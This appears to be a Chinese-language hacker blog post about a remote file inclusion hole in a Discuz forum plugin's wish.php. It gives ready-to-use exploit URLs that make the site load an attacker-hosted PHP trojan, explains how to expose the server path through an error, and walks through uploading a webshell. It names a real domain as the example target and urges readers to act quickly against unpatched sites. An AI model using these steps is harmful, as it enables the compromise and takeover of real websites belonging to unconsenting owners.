PS:話說光這個漏洞《駭客X檔案》都說了N遍,呵呵........
既然有人公布了,也有人連利用程式都寫好了,那我也就公布吧!訊息來源是鬼仔告訴我的,好像是Firefox哪個大哥發現的洞,不太清楚了!
discuz論壇的許願池外掛程式在DZ根目錄有個wish.php檔案,檔案第四行:
require $discuz_root.‘./include/discuzcode.func.php‘;
很明顯程式沒有做任何過濾,一個十足的遠程包含漏洞,具體利用方法就很簡單了:
http://www.163.com/wish.php?discuz_root=http://www.flyt.cn/xxxx.txt?
別忘了後面有個問號!xxxx.txt就是我的PHP木馬,c99shell不知道為什麼,我沒成功,也許與作業系統有關,我沒仔細去實驗了,直接用的安全天使的那PHP後門,不過可以得到一個"webshell",但是用安全天使那PHP後門無法上傳我們真正的webshell上去,所以用下面這個檔案就可以上傳你的WEBSHELL到網站目錄,
怎麼得到網站實際路徑呢?很簡單,直接開啟http://www.163.com/wish.php?discuz_root=http://www.flyt.cn/xxxx.txt ,不要最後那個問號,這時你會發現程式報錯了,網站的實際路徑也就出來了!修改個檔案裡的
C:Inetpubvhostsaidu.combs
為當前你要黑的這個網站實際路徑;cntink.php是你上傳webshell後需要儲存的名字,隨便你取什麼!
把上面那檔案儲存為txt(其他副檔名也可以)上傳到你自己的網站,比如我取名為fly.txt,現在再開啟
http://www.163.com/wish.php?discuz_root=http://www.flyt.cn/fly.txt?
OK...看見上傳對話方塊了吧,慢慢上傳你的webshell吧!上傳後的路徑就是你在fly.txt中所設定的路徑!
以上文章純屬亂寫,誰利用這方法黑了站遇到麻煩別找我....其實這玩意應該是發布補丁後才能公開的,但又不是官方的外掛程式,而且別人都發了,無所謂了!
PS:要行動的快點,引用群裡某X的一句話: baidu google都把discuz inurl:wish.php搜完了 不過漏洞沒補
http://www.bkjia.com/PHPjc/629813.htmlwww.bkjia.comtruehttp://www.bkjia.com/PHPjc/629813.htmlTechArticlePS:話說光這個漏洞《駭客X檔案》都說了N遍,呵呵........ 既然有人公布了,也有人連利用程式都寫好了,那我也就公布吧!訊息來源是鬼仔告訴...